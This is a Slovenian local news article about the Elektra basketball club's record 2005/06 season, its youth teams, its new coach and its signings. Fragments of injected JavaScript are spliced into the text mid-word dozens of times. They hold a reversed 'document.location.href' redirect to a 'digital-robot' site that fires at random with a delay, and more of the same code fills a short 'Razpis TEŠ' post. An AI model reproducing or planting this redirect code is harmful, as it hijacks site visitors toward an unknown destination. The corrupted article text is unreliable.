Novice iz Košarkarskega kluba Elektra

NAJVEčJI USPEH V ZGODOVINI KLUBA

članska ekipa Košarkarskega kluba Elektra je pod vodstvom trenerja Dušana Hauptmana in pomočnika trenerja Boruta Cerarja ter z novim imenom Elektra Esotech v sezoni 2005/06 dosegla največji uspeh v skoraj 60-letni zgodovini kluba! Po zaključku tekem v državnem prvenstvu 2005/06 je članska ekipa osvojila 4. mestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to med vsemi slovenskimi ekipami v Sloveniji, ter se tako prvič uvrstila v polfinale državnega prvenstva. V polfinalu se je pomerila z močno ekipo Geoplin Slovana, ki rednem delu državnega prvenstva ni nikoli izgubila. Tudi zaradi poškodb nekaterih igralcev Elekte Esotech je Geoplin Slovan v polfinalu dvakrat zmagal in se tako uvrstil v finale državnega prvenstva.

MLAJŠE SELEKCIJE

Košarkarski klub Elektra se ponaša z zelo dolgo tradicijo kakovostnega in uspešnega dela z mladimi. Vsako letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to se trudimo pritegniti čim večje število mladih ter jim omogočiti športno udejstvovanje pod strokovnim vodstvom. Tako smo v letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tošnji sezoni v sistem rednega treniranja vključili od 170 do 180 otrok v 14. vadbenih skupinah, ki so bile vodene s strani ustrezno usposobljenih trenerjev, strokovnjakov.

V pretekli sezoni smo prvič uvedli dve skupini imenovani Mala šola košarke, kjer trenirajo fantje stari 4 do 8 let. Poudarek je na športnih aktivnostih in v okviru tega tudi na košarki, ki je seveda prilagojena tej starostni skupini (manjše žoge in nižji koši).

V okviru osnovnih šol v Šaleški dolini smo oblikovali kar 5 ekip, katere imenujemo »šola košarke«, kjer se najmlajši prvič srečajo s skupinskim delom. Namen šole košarke je pritegniti čim več mladih iz »ulice«, ter jim omogočiti druženje z njihovimi vrstniki kakor tudi kasnejše napredovanje v skupino imenovano mlajši pionirji, kjer mladi že izpopolnjujejo svoje znanje in ga lahko pokažejo v organiziranih tekmah oz. regijskih ligah.

Višje ko gremo po lestvici vadbenih skupin, višji je nivo treniranja in več je organiziranih tekem. če imajo mladi v šoli košarke na voljo 1 uro tedensko, imajo kadeti in mladinci na voljo 15 ur tedensko izpopolnjevat svoje košarkarsko znanje. Pri tem ključno vlogo igra strokovni kader, ki si svoje znanje redno izpopolnjuje na državnih in internih seminarjih.

Vse ekipe mlajših selekcij kluba so se predstavile na prireditvi Dan Elektre, ki je bila januarja letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos izvedena drugič in je odlično uspela. Igralci, razvrščeni po ekipah, so se pomerili med sabo in vodstvu kluba, gledalcem ter svojim staršem pokazali, kaj so se naučili.

Prav tako smo v klubu prvič uspešno organizirali dva nivoja regionalnih lig. Enega za dečke rojene 1992 in mlajše, ter drugega za dečke rojene 1994 in mlajše. Imenovali smo jo Šaleško – Savinjska regionalna liga. Ekipi so si skozi sistem tekmovanja priigrale nastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top na finalnem turnirju, kjer so najboljši dobili tudi priznanja.

Vse teh uspehov pa se ne bi mogli veseliti, če v sredini v kateri delamo, ne bi naleteli na nesebično in prostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovoljno pomoč posameznikov in mnogih podjetij ter drugih organizacij. Izkoriščamo priložnost in se jim zahvaljujemo, še posebej pa vsem staršem naših mladih igralcev, ki nosijo glavno breme vseh obveznosti, ki jih prinaša redno treniranje košarke. Zahvaljujemo se tudi vsem trenerjem in učiteljem športne vzgoje na osnovnih šolah, ravnateljem in tudi vsem sponzorjem, ki s svojimi prispevki sploh omogočajo, da lahko skrivnosti košarke in športni duh vnašamo med naše mlade igralce.

čLANSKA EKIPA ELEKTRA ESOTECH V PRIHODNJI SEZONI

Novi trener Košarkarskega kluba Elektra je Bojan Lazič, ki je svoje znanje izpopolnjeval najprej dve leti z mlajšimi kategorijami pri Slovanu, natobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to 4 leta kot pomočnikv članski ekipi Geoplina Slovana in sicer pri trenerjih Tomo Mahorič, Ivan Sunara in Jure Zdovc. V zadnjem letu dela pri Slovanu je bil tudi dobre tri mesece prvi trener članske ekipe Geoplin Slovan. Lansko poletje je bil pomočnik Anteju Perici v slovenski reprezentanci do 20 let, ki se je udeležila svetobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovnega prvenstva v Argentini. Zadnjo sezono pa je vodil ekipo Kraški zidar iz Sežane. Bojan Lazič je podpisal dvoletno pogodbo o sodelovanju s Košarkarskim klubom Elektra.

Delo pomočnika trenerja bo tudi v prihodnji sezoni še naprej opravljal domači trener, Borut Cerar, ki je hkrati tudi trener mladincev in kadetobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov. Seveda pa ob tem ne smemo pozabiti tudi na kondicijskega trenerja Tineta Stainerja, fizioterapevta Vlada Pečnika, zdravnika Miro Vujasinoviča in sekretarja Duška Supiča. Vsi navedeni veliko pripomorejo k uspehom članske ekipe.

Od igralcev članske ekipe v sezoni 2005/06 so v klubu ostali: kapetan in organizatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor igre  Miha čmer, krilni center Srboljub Nedeljkovič, branilca Marjan Vidovič in Luka Dobovičnik ter organizatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor igre Žiga Mravljak. V prihodnji sezoni se bodo ekipi pridružili še nekateri obetavni mladi igralci iz mladinskih selekcij.

Po odhodu Saliha Nuhanoviča in Grega Malija v Pivovarno Laško ter Nika Ivanoviča v Srbijo, poskuša vodstvo kluba v člansko ekipo pritegniti nekatere kvalitetne slovenske igralce in s tem nadomestiti igralce, ki so odšli.

Tako bo prihodnji dve sezoni dres Elektre nosil 203 centimetre visoki Jernej Mihalič, ki je minulo sezono igral v Škofji Loki pri Loka kavi TCG. 21–letni Mihalič je športno pot začel v Union Olimpiji, katere barve je branil med leti 2001–2005. Nastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topal je za člansko B ekipo tega kluba v I. B SKL. Lani je odšel na Gorenjsko, kjer je v dresu kavarjev odigral 31 tekem v Ligi UPC Telemach.

Poleg Mihaliča je nova okrepitev članske ekipe Blaž Ručigaj. Pred prihodom v Šoštanj je igral v Kemoplastu, Heliosu, Balkan Steel – u, Triglavu in na Polzeli. Je pa dober znanec domačih navijačev, saj je nastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topal za člansko ekipo kluba tudi v sezoni 2004/05.

Poleg teh dveh je ekipo okrepil še Sissoko Kabine mlad, temnopolti igralec, iz afriške države Mali in s hrvaškim potnim listobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom. Perspektivni, 19-letni igralec, je visok kar 207 centimetrov in igra na poziciji krilnega centra. Izkušnje si je nabiral v klubih Bamako (Mali), KK Zagreb (CRO) in BC Boncourt (CH).

VETERANI ELEKTRE

Košarkarski klub Elektra ima že tretje letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to veteransko sekcijo, ki jo večinoma sestavljajo bivši aktivni košarkarji Elektre. člani sekcije imajo treninge dvakrat tedensko, občasno pa organizirajo oz. se udeležijo veteranskih turnirjev.Medse vabijo vse ljubitelje košarke, ki bi želeli redno in rekreativno trenirati košarko.

Dejavni so tudi v organizaciji turnirjev za veterane, saj vsako letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to izvedejo vsaj dva.

BILTEN KOŠARKARSKEGA KLUBA ELEKTRA 2005/06

Košarkarski klub Elektra je v najuspešnejši sezoni v zgodovini kluba – 4. mestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to v državnem prvenstvu – dobila navdih za izdajo prvega biltena, ki na skoraj 30 straneh prikazuje vse uspehe, dosežke in dogodke, ki so zaznamovali sezono in tudi zgodovino kluba.

SEZONA 2006/07

Igralci članske ekipe se bodo na prvem treningu v sezoni 2006/07 zbrali v tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torek, 1. avgusta in se s pomočjo novega trenerja in njegovega pomočnika pričeli pripravljati na novo tekmovalno sezono v Ligi UPC Telemach, ki se bo pričela 14. oktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobra.

V avgustu bodo z rednimi treningi pričeli tudi starejši igralci mladinskih selekcij, medtem ko bodo skupine dečkov in skupine šole košarke pričele s treningi z začetkom novega šolskega leta.

Vse novice in obvestila Košarkarskega kluba Elektra lahko spremljate na spletnih straneh: http://www.kk-elektra.si

Slika: Pregled končnih uvrstitev članske ekipe Elektre od osamosvojitve Slovenije do danes

Bojan Rotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovnik in
Duško Supič

Sostanj.info3758 Posts

Razpis TEŠ

Standom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and up za Duškota

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki